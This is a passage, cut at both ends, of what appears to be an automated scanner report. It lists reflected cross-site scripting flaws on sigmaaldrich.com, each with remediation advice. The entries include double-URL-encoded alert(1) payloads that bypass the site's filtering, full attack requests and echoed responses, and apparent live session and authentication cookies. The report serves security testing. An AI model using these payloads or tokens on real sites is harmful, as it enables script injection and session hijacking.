Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:37 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/fffa9";alert(1)//3d3b109cc80","E404") ;
   </script>
...[SNIP]...

1.555. http://www.sigmaaldrich.com/life-science/life-science-catalog.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-catalog.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd40a%2522%253balert%25281%2529%252f%252f1c12647a62d was submitted in the REST URL parameter 1. This input was echoed as bd40a";alert(1)//1c12647a62d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencebd40a%2522%253balert%25281%2529%252f%252f1c12647a62d/life-science-catalog.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:25 GMT
Content-Length: 28942
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencebd40a";alert(1)//1c12647a62d/life-science-catalog.html","E404") ;
   </script>
...[SNIP]...

1.556. http://www.sigmaaldrich.com/life-science/life-science-catalog.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-catalog.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69a97%2522%253balert%25281%2529%252f%252f6cf6b7c39ad was submitted in the REST URL parameter 2. This input was echoed as 69a97";alert(1)//6cf6b7c39ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/69a97%2522%253balert%25281%2529%252f%252f6cf6b7c39ad HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:27 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/69a97";alert(1)//6cf6b7c39ad","E404") ;
   </script>
...[SNIP]...

1.557. http://www.sigmaaldrich.com/life-science/life-science-services.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-services.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e526f%2522%253balert%25281%2529%252f%252f2541cf96a68 was submitted in the REST URL parameter 1. This input was echoed as e526f";alert(1)//2541cf96a68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencee526f%2522%253balert%25281%2529%252f%252f2541cf96a68/life-science-services.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:37 GMT
Content-Length: 28944
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencee526f";alert(1)//2541cf96a68/life-science-services.html","E404") ;
   </script>
...[SNIP]...

1.558. http://www.sigmaaldrich.com/life-science/life-science-services.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-services.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cea8%2522%253balert%25281%2529%252f%252f337f97a7b4c was submitted in the REST URL parameter 2. This input was echoed as 6cea8";alert(1)//337f97a7b4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/6cea8%2522%253balert%25281%2529%252f%252f337f97a7b4c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:39 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/6cea8";alert(1)//337f97a7b4c","E404") ;
   </script>
...[SNIP]...

1.559. http://www.sigmaaldrich.com/life-science/life-science-services/cloning-transfection.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-services/cloning-transfection.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1cd6%2522%253balert%25281%2529%252f%252f57771a356b5 was submitted in the REST URL parameter 1. This input was echoed as f1cd6";alert(1)//57771a356b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencef1cd6%2522%253balert%25281%2529%252f%252f57771a356b5/life-science-services/cloning-transfection.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; 